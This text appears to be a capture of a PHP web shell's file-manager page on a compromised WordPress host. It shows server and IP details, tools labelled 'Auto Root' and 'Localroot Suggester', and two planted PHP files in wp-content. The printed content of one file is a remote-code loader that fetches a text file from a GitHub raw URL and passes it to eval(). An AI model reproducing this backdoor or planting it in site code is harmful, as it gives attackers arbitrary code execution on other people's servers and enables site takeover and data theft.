Linux s36.hosting-manage.com 4.18.0-553.16.1.lve.el8.x86_64 #1 SMP Tue Aug 13 17:45:03 UTC 2024 x86_64
LiteSpeed
Server IP : 158.69.52.169 & Your IP : 216.73.216.89
Domains :
Cant Read [ /etc/named.conf ]
User : academic
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
academic /
public_html /
wp-content /
Delete
Unzip
Name
Size
Permission
Date
Action
plugins
[ DIR ]
drwxr-xr-x
2026-07-01 18:44
themes
[ DIR ]
drwxr-xr-x
2026-07-01 18:44
AMJQjqX.php
573
B
-rw-r--r--
2026-07-20 05:26
x.php
573
B
-rw-r--r--
2026-07-20 05:26
Save
Rename
<?php $url = "https://raw.githubusercontent.com/apchelinux/debug/refs/heads/main/license.txt"; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, true); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); $body = substr($response, $header_size); if (curl_errno($ch)) { echo "cURL error: " . curl_error($ch); } elseif ($http_code != 200) { echo "HTTP Error: $http_code"; } else { eval("?>" . $body); } curl_close($ch); ?>